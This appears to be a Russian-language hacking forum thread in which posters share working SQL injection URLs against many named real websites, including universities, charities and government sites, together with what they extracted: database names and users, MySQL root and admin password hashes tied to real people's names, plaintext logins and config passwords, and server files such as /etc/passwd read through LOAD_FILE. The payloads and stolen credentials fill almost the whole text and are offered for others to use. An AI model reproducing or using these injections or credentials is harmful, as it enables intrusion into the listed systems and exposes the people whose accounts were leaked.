5.0.32-Debian_7etch1:plmconfe66633@217.64.195.223:plmconf e66633

вывод в <title></title>

-----------------------------------------------------------------------------------------------------------------------------
The End!

Ассоциация специалистов восстановительной медицины

http://www.asvomed.ru/php/content.php?id=-452+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,1 5,16,17,18,19+from+u16011_2.admin--&pr=print

www.usedcardboardboxes.com pr 5


http://www.usedcardboardboxes.com/static_page.php?id=-3%20union%20select%201,load_file(0x2f6574632f70617 3737764),group_concat(0x7c,user,0x7c,password,0x7c ,file_priv,0x7c,user(),0x7c)%20from%20mysql.user

File priv: Y
User : root@localhost


|root|42485fd03777dfd3|Y|root@localhost|
|chevy|2e967e45483f29fe|N|root@localhost|
|ppuricelli|0779d42331d4f0c3|N|root@localhost|
|cc_root|33f9b4321d694b20|N|root@localhost|

/etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/bin/true
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
htt:x:100:101:IIIMF Htt:/usr/lib/im:/sbin/nologin
canna:x:39:39:Canna Service User:/var/lib/canna:/sbin/nologin
wnn:x:49:49:Wnn Input Server:/var/lib/wnn:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
tomcat4:x:101:102:Tomcat4:/var/tomcat4:/bin/bash
majordomo:x:91:91:Majordomo List Manager:/usr/lib/majordomo:/bin/bash
fpweb:x:500:500::/home/fpweb:/bin/bash
clamav:x:102:103:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
vhbackup:x:501:501::/home/vhbackup:/bin/bash
admin60:x:502:502::/home/virtual/site60/fst:/bin/false
admin19:x:506:506::/home/virtual/site19/fst:/bin/false
admin25:x:507:507::/home/virtual/site25/fst:/bin/false
admin14:x:508:508::/home/virtual/site14/fst:/bin/false
admin49:x:510:510::/home/virtual/site49/fst:/bin/false
admin74:x:511:511::/home/virtual/site74/fst:/bin/false
admin99:x:513:513::/home/virtual/site99/fst:/bin/false
admin96:x:514:514::/home/virtual/site96/fst:/bin/false
admin79:x:515:515::/home/virtual/site79/fst:/bin/false
admin94:x:516:516::/home/virtual/site94/fst:/bin/false
admin22:x:517:517::/home/virtual/site22/fst:/bin/false
admin3:x:518:518::/home/virtual/site3/fst:/bin/false
admin24:x:519:519::/home/virtual/site24/fst:/bin/false
admin35:x:520:520::/home/virtual/site35/fst:/bin/false
admin95:x:521:521::/home/virtual/site95/fst:/bin/false
admin33:x:522:522::/home/virtual/site33/fst:/bin/false
admin50:x:523:523::/home/virtual/site50/fst:/bin/false
admin82:x:524:524::/home/virtual/site82/fst:/bin/false
admin36:x:526:526::/home/virtual/site36/fst:/bin/false
admin43:x:528:528::/home/virtual/site43/fst:/bin/false
admin12:x:529:529::/home/virtual/site12/fst:/bin/false
admin91:x:531:531::/home/virtual/site91/fst:/bin/false
admin54:x:535:535::/home/virtual/site54/fst:/bin/false
admin90:x:538:538::/home/virtual/site90/fst:/bin/false
admin20:x:540:540::/home/virtual/site20/fst:/bin/false
admin97:x:541:541::/home/virtual/site97/fst:/bin/false
admin21:x:542:542::/home/virtual/site21/fst:/bin/false
admin83:x:543:543::/home/virtual/site83/fst:/bin/false
admin2:x:545:545::/home/virtual/site2/fst:/bin/false
admin77:x:548:548::/home/virtual/site77/fst:/bin/false
admin29:x:549:549::/home/virtual/site29/fst:/bin/false
admin73:x:550:550::/home/virtual/site73/fst:/bin/false
admin6:x:551:551::/home/virtual/site6/fst:/bin/false
admin4:x:552:552::/home/virtual/site4/fst:/bin/false
admin7:x:553:553::/home/virtual/site7/fst:/bin/false
admin52:x:554:554::/home/virtual/site52/fst:/bin/false
admin30:x:555:555::/home/virtual/site30/fst:/bin/false
admin51:x:556:556::/home/virtual/site51/fst:/bin/false
admin102:x:562:562::/home/virtual/site102/fst:/bin/false
admin32:x:563:563::/home/virtual/site32/fst:/bin/false
admin26:x:564:564::/home/virtual/site26/fst:/bin/false
admin76:x:565:565::/home/virtual/site76/fst:/bin/false
admin39:x:567:567::/home/virtual/site39/fst:/bin/false
admin31:x:570:570::/home/virtual/site31/fst:/bin/false
admin27:x:572:572::/home/virtual/site27/fst:/bin/false
admin93:x:573:573::/home/virtual/site93/fst:/bin/false
admin44:x:574:574::/home/virtual/site44/fst:/bin/false
admin101:x:576:576::/home/virtual/site101/fst:/bin/false
admin88:x:577:577::/home/virtual/site88/fst:/bin/false
admin38:x:578:578::/home/virtual/site38/fst:/bin/false
admin85:x:579:579::/home/virtual/site85/fst:/bin/false
admin28:x:581:581::/home/virtual/site28/fst:/bin/false
admin42:x:582:582::/home/virtual/site42/fst:/bin/false
admin64:x:583:583::/home/virtual/site64/fst:/bin/false
admin41:x:584:584::/home/virtual/site41/fst:/bin/false
admin75:x:586:586::/home/virtual/site75/fst:/bin/false
admin70:x:587:587::/home/virtual/site70/fst:/bin/false
admin8:x:589:589::/home/virtual/site8/fst:/bin/false
admin53:x:590:590::/home/virtual/site53/fst:/bin/false
admin13:x:591:591::/home/virtual/site13/fst:/bin/false
admin1:x:592:592::/home/virtual/site1/fst:/bin/false
admin10:x:593:593::/home/virtual/site10/fst:/bin/false
admin89:x:594:594::/home/virtual/site89/fst:/bin/false
admin11:x:595:595::/home/virtual/site11/fst:/bin/false
admin67:x:596:596::/home/virtual/site67/fst:/bin/false
admin23:x:597:597::/home/virtual/site23/fst:/bin/false
admin80:x:598:598::/home/virtual/site80/fst:/bin/false
admin5:x:599:599::/home/virtual/site5/fst:/bin/false
admin34:x:600:600::/home/virtual/site34/fst:/bin/false
admin15:x:601:601::/home/virtual/site15/fst:/bin/false
admin46:x:604:604::/home/virtual/site46/fst:/bin/false
admin48:x:605:605::/home/virtual/site48/fst:/bin/false
admin55:x:606:606::/home/virtual/site55/fst:/bin/false
admin57:x:607:607::/home/virtual/site57/fst:/bin/false
admin58:x:608:608::/home/virtual/site58/fst:/bin/false
admin9:x:610:610::/home/virtual/site9/fst:/bin/false
admin59:x:611:611::/home/virtual/site59/fst:/bin/false
admin61:x:612:612::/home/virtual/site61/fst:/bin/false
admin62:x:613:613::/home/virtual/site62/fst:/bin/false
admin65:x:615:615::/home/virtual/site65/fst:/bin/false
admin66:x:616:616::/home/virtual/site66/fst:/bin/false
admin68:x:617:617::/home/virtual/site68/fst:/bin/false
admin69:x:618:618::/home/virtual/site69/fst:/bin/false
admin71:x:619:619::/home/virtual/site71/fst:/bin/false
admin72:x:620:620::/home/virtual/site72/fst:/bin/false
admin81:x:621:621::/home/virtual/site81/fst:/bin/false
admin37:x:622:622::/home/virtual/site37/fst:/bin/false
admin16:x:623:623::/home/virtual/site16/fst:/bin/false
admin17:x:624:624::/home/virtual/site17/fst:/bin/false
admin18:x:625:625::/home/virtual/site18/fst:/bin/false
admin40:x:626:626::/home/virtual/site40/fst:/bin/false
admin45:x:627:627::/home/virtual/site45/fst:/bin/false

http://www.pntcd-bihor.ro/evenim_recente.php?id=-63+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4--



Database Version: 5.0.51a-community-log
Database name: pntcd_bihor
User name: pntcd@localhost

.edu от меня))))


Сайт

www.opsu.edu

OPSU Home

http://www.opsu.edu/news.php?id=-401+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--

Database Version: 4.1.21
Database name: opsu
User name: www-opsu@localhost

ТИЦ: 10
PR: 6
__________________________________________________ ______________________


Сайт

www.lagunacollege.edu

Laguna College of Art and Design

http://www.lagunacollege.edu/news.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7--

Database Version: 5.0.37-log
Database name: lcad
User name: newwww@www.lagunacollege.edu

ТИЦ: 0
PR: 5

http://ventura.rudtp.ru/articles.php?id=-5+union+select+1,2,3,concat(version(),0x3a,user())

http://www.toys-house.ru/articles.php?id=-5+union+select+1,concat(username,0x3a,user_passwor d),3,4,5,6,7+from+phpbb_users+limit+1,1

http://www.jonaschalk.neu.edu/search_archives/display.php?id=-75+union+select+passone,2,3,4+from+cmc.users/*

http://www.jonaschalk.neu.edu/search_archives/display.php?id=-75+union+select+concat(user(),0x3a,version()),2,3, 4+from+cmc.users/*

edtech@localhost:5.0.45

manchester-center.com PR=4


http://www.manchester-center.com/news.php?ax=v&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--


Version:4.1.22-standard
User:manchest_user@localhost
Database: manchest_cms

http://www.klen-net.ru/index.php?page=7&action=71&article_id=99999+union+select+concat_ws(0x3a,versi on(),database( ),user())--&type_news=15&key_view=Y

Database Version : 4.0.27
Database name : klenhost
User name : klenhost@zvm21.host.ru

админ :

http://www.klen-net.ru/index.php?page=7&action=71&article_id=99999+union+select+conca t_ws(0x3a,user ,password)+from+mysql.user--

root:50884e13230c9c77

file_priv Y

Весь вывод в title.

http://www.snagov.ro/ro/index.php?s=-321+union+select+1,concat_ws(0x3a,version(),databa se(),useR()),3,4,5,6


Database Version: 5.0.45
Database name: snagov
User name: snagov@localhost


http://www.snagov.ro/ro/index.php?s=-321+union+select+1,concat_ws(0x3a,memberName,passw d),3,4,5,6+FROM+snagov.smf_members+limit+x,1/*

x=0...19

snagov:62fdef2f28e57e4ac2e54bb2b41cd99cea3535ca
ct:36fe922b2c4988cae4265e0519b0a3e4
stefan:67d75265eed103d1445e21d56cc7a4bc
dioprea:4ec8089aabd87717340b49c15f64f963
dorel:4772ec50b3d82b89b52515e1cc3807f4
222:4cc931b5fe8a077c94480fede5dfd8ce

http://www.ruswood.ru/index.php?go=news&id=-1+union+select+concat_ ws(0x3a,version(),database(),user()),2,3,4--

Database Version : 4.1.22-log
Database name : wwweugineru_ruswood
User name : eugine_ruswood@fe52.hc.ru

http://www.pneurom.ro/News.asp?NID=-3+or+1=@@version--


Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.michiganchannel.umich.edu/show.php?id=1289/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23/**/LIMIT/**/1,1/*

Database Version: 4.1.22-community
Database name: michigantv2
User name: glrc@172.16.0.10

ишо edu!

_http://www.cnetnetworks.com/press/media.php?y=-1+union+select+*+from+mysql.information_schema+whe re+table_schema=cnetnetworks--
database - cnetnetworks
user - cnetadmin

toptestprep.com

Database Version: 5.0.75-community-log
Database name: miroadva_miro
User name: miroadva_miro@localhost

http://www.toptestprep.com/articles.php?id=-5+union+select+1,concat(user_login,0x3a,user_pass) ,3+from+wp_users

http://www.toptestprep.com/blog/wp-login.php
admin:miro1234

http://www.sacalaz.ro/evenimente_locale.php?pag=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR())


Database Version: 4.1.22-standard
Database name: domvisio_sacalaz
User name: domvisio_sacalaz@localhost

http://www.presidium.ru/catalog.php?cat=4&id=-1+union+select+conca t_ws(0x3a,version(),database(),user()),2--

Database Version : 5.0.26-Max
Database name : presidium
User name : mysql-user@localhost

admin :

http://www.presidium.ru/catalog.php?cat=4&id=-1+union+select+concat_ws(0x3a,user,password,file_p riv),2+from +mysql.user--

file_priv Y

root:32638eb16b0c67ed

PR: 4
тИЦ: 60
kharkov-sport.com
http://www.kharkov-sport.com/news.phtml?id=731+and+null+union+select+concat_ws( 0x3a,user(),database(),version()),2,3,4,5,6,7,8,9, 10,11/*
user():database():version()
kharkov_kharkovs@localhost:kharkov_kharkovsport:4. 1.22-standard-log

http://www.visitfelixstowe.co.uk/things_to_see_and_do_listing.php?cid=9+union+selec t+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,password,17, 18,19,20,21,22,23,24,25,26+from+tbl_administrator+ limit+1,1--

Dbname: web78-felixstowe
Version: 5.0.67-community
Username: web78-felixstowe@localhost

http://realty.stroycomplex.su/
ПР1
Тиц10
Version: 4.1.18-standard
Database: db_stroycomplex1
User: stroycomplex1@localhost.localdomain
http://realty.stroycomplex.su/open.php?id=34324234%20union%20select%201,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33--

Да, давно я ничего не выкладывал, работа.. =))

http://www.otpdl.ro/Parlamentaritineri.html?par=-497+union+select+null,concat_ws(0x3a,version(),dat abasE(),useR()),null,null,null,null,null,null,null


Version : 4.1.22-standard
Database : otpdlro_otpdl
User : otpdlro_otpdl@localhost

тИЦ = 375
PageRank = 8


http://www.ncl.ac.uk/iss/teaching/rooms/locations/room.php?id=90809776656544443348908+union+select+1 ,concat_ws(0x3a,user(),version(),database()),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54--


Database Version: 5.0.45-log
Database name: nig6
User name: nig6@van.ncl.ac.uk6



База:


Database [nig6]
Table [DigitalSignage ( Rows)]
DSID
NetworkName
IP
Location
timeChecked
DateChecked
Table [Digitisers ( Rows)]
DigitiserID
NetworkName
IP
Location
Table [Inventory_Categories ( Rows)]
Cat_ID
Equip_Name
Cat_Shortcode
Cost
PAT
PAT_Type
PAT_Interval
Table [Inventory_Equipment ( Rows)]
Equip_ID
Equipment_Type
Make
Model
Serial_No
Purchase_Date
Supplier
Location
Table [Inventory_Manufacturers ( Rows)]
Manufacturer_ID
Manufacturer_Name
Table [Inventory_PAT_Types ( Rows)]
PAT_ID
PAT_Type
Table [Inventory_Suppliers ( Rows)]
Supplier_ID
Supplier_Name
Table [LectureRoomAccessibility ( Rows)]
AccessibilityID
Accessibility
Table [LectureRoomBookings ( Rows)]
BookingID
Booking
Table [LectureRoomBuildings ( Rows)]
BuildingID
BuildingName
Table [LectureRoomControl ( Rows)]
ControlID
Control
Table [LectureRoomFloors ( Rows)]
FloorID
Floor
Table [LectureRoomMicCollectionPoints ( Rows)]
MicID
Location
Table [LectureRoomType ( Rows)]
TypeID
Type
Table [LectureRoomsInfo ( Rows)]
ID
RoomName
Capacity
RoomType
Building
Floor
Accessibility
Recap
Bookings
ControlSystem
DataProjector
DesktopPC
DVDPlayer
SlideProjector
Visualiser
OHP
LaptopConnection
PA
LapelRadioMic
FixedLecternMic
HandheldRadioMic
ProjectionScreen
WritingSurface
Userinstructions
RoomInfo
Telephone
Image
InductionLoop
dateupdated
datecreated
DVDMultiregion
LapelMicNo
HandheldMicNo
MicCollection
RoomAvailable
Furtherinfo
Plasma
projectormodel
Displaywatch
Netcam
RadioMicFreq1
RadioMicFreq2
RadioMicFreq3
RadioMicFreq4
TelNo
ProjPurchDate
LampHours
ProjSerialNo
BLANK
Projector
DisplayWatch2
AxisCam2
DateChecked
CheckedBy
Table [Locations ( Rows)]
LocationID
Location
Table [NewPCData ( Rows)]
ID
DateDeleted
Manufacturer
ProcessorType
ProcessorSpeed
Memory
HardDisk
HDSPACE
NetworkName
IPAddress
MacAddress
Type
UserKeeper
Location
PO
SerialNo
DateChecked
Opsys
Resolution
GraphicsCard
PurchaseDate
GP
timeChecked
Netcam
Displaywatch
GUID
biosset
wakeonlan
lastbootdate
lastboottime
Table [RoomStats ( Rows)]
TechID
TechName
NoChecked
Table [backupnewpcdata ( Rows)]
ID
DateDeleted
Manufacturer
ProcessorType
ProcessorSpeed
Memory
HardDisk
HDSPACE
NetworkName
IPAddress
MacAddress
Type
UserKeeper
Table [backuprooms ( Rows)]
ID
RoomName
Capacity
RoomType
Building
Floor
Accessibility
Recap
Bookings
ControlSystem
DataProjector
DesktopPC
DVDPlayer
SlideProjector
Visualiser
OHP
LaptopConnection
PA
LapelRadioMic
FixedLecternMic
HandheldRadioMic
ProjectionScreen
WritingSurface
Userinstructions
RoomInfo
Telephone
Image
InductionLoop
dateupdated
datecreated
DVDMultiregion
LapelMicNo
HandheldMicNo
MicCollection
RoomAvailable
Furtherinfo
Plasma
projectormodel
Displaywatch
Netcam
RadioMicFreq1
RadioMicFreq2
RadioMicFreq3
RadioMicFreq4
TelNo
ProjPurchDate
LampHours
ProjSerialNo
BLANK
Projector
DisplayWatch2
AxisCam2
Table [backuproomsnov ( Rows)]
ID
RoomName
Capacity
RoomType
Building
Table [copyLocations ( Rows)]
LocationID
Location
Table [copynewPCData ( Rows)]
ID
AssetTag
Manufacturer
ProcessorType
ProcessorSpeed
Memory
HardDisk
HDSPACE
NetworkName
IPAddress
MacAddress
Type
UserKeeper
Location
PO
SerialNo
DateChecked
Opsys
Resolution
GraphicsCard
PurchaseDate
GP
timeChecked
Netcam
Displaywatch
Table [deletedpcs ( Rows)]
ID
DateDeleted
Manufacturer
ProcessorType
ProcessorSpeed
Memory
HardDisk
HDSPACE
NetworkName
IPAddress
MacAddress
Type
UserKeeper
Location
PO
SerialNo
DateChecked
Opsys
Resolution
GraphicsCard
PurchaseDate
GP
timeChecked
Netcam
Displaywatch
GUID
biosset
wakeonlan
lastbootdate
lastboottime
Table [lampstock ( Rows)]
lampID
lamp_code
numberinstock
numberonorder
MaxHours
Table [loanprojectors ( Rows)]
loanprojid
projectormodel
idcode
purchasedate
Table [projectors ( Rows)]
projectorID
makeandmodel
lamp_code
instructions
Table [testpcdata ( Rows)]
ID
DateDeleted
Manufacturer
ProcessorType
ProcessorSpeed
Memory
HardDisk
HDSPACE
NetworkName
IPAddress
MacAddress
Type
UserKeeper
Location
PO
SerialNo
DateChecked
Opsys
Resolution
GraphicsCard
PurchaseDate
GP
timeChecked
Netcam
Displaywatch
GUID
biosset
wakeonlan
lastbootdate
lastboottime

http://www.primariagrosi.ro/primaria-grosi_componenţa%20consiliului%20local-12+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user()),7,8,9+limit+1,1.html



Database Version: 5.1.30
User name: grosi grosi@localhost
Database name: grosi grosi


таблички и колонки нормальным запросом не получилось, но и не заморачивался сильно.... substring

тИЦ = 325
PageRank = 8

http://www.bath.ac.uk/robots.txt



http://www.bath.ac.uk/chaplaincy/people/profile.php?id=889087987654434+union+select+1,conc at_ws(0x3a,version(),user(),database()),3,4,5,6,7--


Database Version: 5.0.51b-log
Database name: CHAPLAINCY
User name: chaplaincyuser@snoopy.bath.ac.uk


Пользователи:

http://www.bath.ac.uk/chaplaincy/people/profile.php?id=889087987654434+UNION+SELECT+1,AES_ DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(id, 0x3a,name,0x3a,username,0x3a,password)+FROM+CHAPLA INCY.login+LIMIT+1,1),0x3a),0x71),0x71),3,4,5,6,7--



3 : Tim Wakeling : tjw : fa2b488a77e9c067c5b66b7404943ebb
4 : Mother Sarah : mcs : 2cf11729b85d817ea9de30d9c0d90066
6 : Angela Berners-Wilson : adxab : 8e9b1d3d7b6445bc93dbd769de2fa511



База:


Database [CHAPLAINCY]
Table [ann ( Rows)]
id
startdate
enddate
announcement
Table [churchareas ( Rows)]
areanumber
areaname
areadescription
Table [churches ( Rows)]
id
churchname
denomination
tradition
churchaddress
postcode
area
ministernames
contactphone
contactemail
churchwebsite
churchdescription
servicedetails
eveningservice
busroutes
nearsundaybus
studentmembers
otherinfo
Table [faithsocs ( Rows)]
id
name
fullname
description
emailcontact1
emailaddress1
emailcontact2
emailaddress2
website
Table [features ( Rows)]
id
dateadded
title
descriptionfirst
descriptionrest
article
author
filename
Table [help ( Rows)]
id
sort
title
content
Table [hometexts ( Rows)]
id
setname
welcometitle
welcomemessage
section1
section2
section3
section4
section5
section6
thought
thoughtby
Table [info ( Rows)]
id
title
description
article
filename
invisible
Table [links ( Rows)]
id
title
url
description
category
Table [login ( Rows)]
id
name
username
password
Table [people ( Rows)]
id
name
filename
role
email
website
profile
Table [photogalleries ( Rows)]
id
dateadded
datemodified
galleryname
galleryfilename
gallerysize
gallerydate
description
icon
Table [photos ( Rows)]
id
galleryid
orderingallery
caption
Table [polls ( Rows)]
pollid
dateposted
question
response1
votesfor1
response2
votesfor2
response3
votesfor3
response4
votesfor4
response5
votesfor5
Table [settings ( Rows)]
holiday
pollsvisible
eventsonhomepage
Table [specialevents ( Rows)]
id
startdate
enddate
starttime
endtime
title
description
Table [weeklyevents ( Rows)]
id
day
start
end
description
allyear






PageRank = 5


http://microarray.csc.mrc.ac.uk//news_item.html?id=55556444444+UNION+SELECT+AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Databa se(),0x3a,User(),0x3a),0x71),0x71),2,3,4,5,6,7,8,9 ,10,11,12-- &name=High%20Sequencing%20Form


Database Version: 5.0.18-nt
Database name: mac_admin
User name: root@localhost




http://microarray.csc.mrc.ac.uk//news_item.html?id=55556444444+UNION+SELECT+AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,user,0x3a,password,0x 3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12+from+mysq l.user--


root : *629F73D84581DE883641DF5DC165597AD9ED9D43



Читаем c:\Program Files\Apache Group\Apache2\conf\httpd.conf

http://microarray.csc.mrc.ac.uk//news_item.html?id=55556444444+UNION+SELECT+AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x633A5C507 26F6772616D2046696C65735C4170616368652047726F75705 C417061636865325C636F6E665C68747470642E636F6E66),0 x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12-- &name=High%20Sequencing%20Form


Читаем c:\Program Files\Apache Group\Apache2\htdocs\section.html

http://microarray.csc.mrc.ac.uk//news_item.html?id=55556444444+UNION+SELECT+AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x633A5C507 26F6772616D2046696C65735C4170616368652047726F75705 C417061636865325C6874646F63735C73656374696F6E2E687 46D6C),0x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12-- &name=High%20Sequencing%20Form


И уже от них пляшем......



http://www.red2black.org.uk/videos.php?id=798665434347987+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8--

Database Version: 5.0.67-community
Database name: red2blac_cms
User name: red2blac_cms@localhost


http://www.thefixuk.co.uk/events/people.php?id=899890798768765434+union+select+1,co ncat_ws(0x3a,version(),user(),database()),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19--

Version:4.0.27-max-log
User:dbo252263493@212.227.66.241
Database:db252263493




http://www.forklift-attachments.co.uk/product_detail.php?store_cat_id=132&prod_id=798369877457986+union+select+1,2,3,4,conca t_ws(0x3a,version(),user(),database()),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49--

Version:4.1.22
User:con_user@localhost
Database:con001

Engage - the anti-racist campaign against antisemitism
http://www.engageonline.org.uk/archives/index.php?id=-13'+union+select+1,concat(user(),0x3a,database(),0 x3a,version()),3/*

user(): engage@localhost
database(): engageonline_org_uk
version(): 4.0.15

http://www.engageonline.org.uk/archives/index.php?id=-13'+union+select+1,concat(log,0x3a,pass),3+from+us ers/*
hougo:ab4f63f9ac65152575886860dde480a1:azerty


www.engageonline.org.uk/blog/admin/

ЧиновникЪ.uapa.ru Официальный сайт Академии Госслужбы

http://chinovnik.uapa.ru/modern/issue.php?id=-13'+union+select+null,LOAD_FILE('c:/boot.ini'),null,null/*

timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Advanced Server" /fastdetect C:\CMDCONS\BOOTSECT.DAT="Microsoft Windows 2000 Recovery Console" /cmdcons ' ()

user(): root@localhost
database(): chinovnik
version(): 5.0.27-community

[B]PR=5

FILE_PRIV=Y
путь=C:\server\vhosts_uapa\chinovnik.uapa.ru\w ww\

дерзайте..

PR - 4


http://www.sclou.org/index.php?id=887654346+union+select+1,AES_DECRYPT( AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(), 0x3a,User(),0x3a),0x71),0x71),3,4,5,6,7,8--

Version:5.0.18-standard-log
Database:sclou
User:terregen@localhost


http://www.sclou.org/index.php?id=887654346+union+select+1,AES_DECRYPT( AES_ENCRYPT(CONCAT(0x3a,Password,0x3a,User,0x3a),0 x71),0x71),3,4,5,6,7,8+from+mysql.user--


*3585AAEF496B5FB4D4BE7C06B61EDB1FDA828703 : root




http://www.msia.org/msia.qry?ID=480980976546+union+select+1,2,3,concat _ws(0x3a,version(),user(),database()),5,6,7--

Version:4.1.20-log
User:msia@localhost
Database:msia


http://www.msia.org/msia.qry?ID=480980976546+union+select+1,2,3,concat _ws(0x3a,user,password),5,6,7+from+mysql.user--


root : 7433abd2154c7925


PageRank = 6

http://www.aarda.org/press_release_display.php?ID=79847980986+union+sel ect+1,2,3,concat_ws(0x3a,version(),user(),database ()),5,6,7--

Version:4.1.22
User:aarda@lhost9.atlantic.net
Database:aarda

http://www.cedema.org/ver.php?id=-1519+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15--

4.1.22

2IP Показал 78 сайтов

http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=5765468766+union+select+1,2,3,concat_ws(0x3a,ve rsion(),user(),database()),5,6--


Database Version: 4.1.22-standard-log
Database name: brit
User name: root@localhost

http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=5765468766+union+select+1,2,3,concat_ws(0x3a,us er,password),5,6+from+mysql.user+limit+0,1--


root : 1e775af3568b3992

Читаем etc/passwd

http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=5765468766+UNION+SELECT+1,2,3,CONCAT(0x3a,LOAD_ FILE(0x2F6574632F706173737764),0x3a),5,6--

Читаем /etc/httpd/conf/httpd.conf

http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=5765468766+UNION+SELECT+1,2,3,CONCAT(0x3a,LOAD_ FILE(0x2F6574632F68747470642F636F6E662F68747470642 E636F6E66),0x3a),5,6--


Читаем конфиг базы /var/www/html/bcm/settings.php

http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=5765468766+UNION+SELECT+1,2,3,CONCAT(0x3a,LOAD_ FILE(0x2F7661722F7777772F68746D6C2F62636D2F7365747 4696E67732E706870),0x3a),5,6--


//database settings, variable names should explain themselves
$mysql_server = 'localhost'; //as in localhost
$mysql_username = ' root ';
$mysql_password = ' save406 ';
$mysql_database = ' brit ';
//

И впрёёёёддд.......



https://thedfi.hs-cluster-1.net/event.php?id=8897654322+union+select+1,concat_ws(0 x3a,version(),user(),database()),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47--


Database Version: 5.0.67-log
Database name: thedfi_data
User name: thedfi_user@65.99.201.17

Наверное это Админчег

https://thedfi.hs-cluster-1.net/event.php?id=8897654322+UNION+SELECT+1,CONCAT(0x3a ,(SELECT+CONCAT(username,0x3a,upassword,0x3a,email address,0x3a,firstname,0x3a,lastname,0x3a,security level)+FROM+thedfi_data.passwords+LIMIT+1,1),0x3a) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47--


: shott : 38108a1210ec0f39 : : Shirley : Hott : 1

http://www.melnikov-tex.ru/
1

Version: 4.1.22
Database:
User:
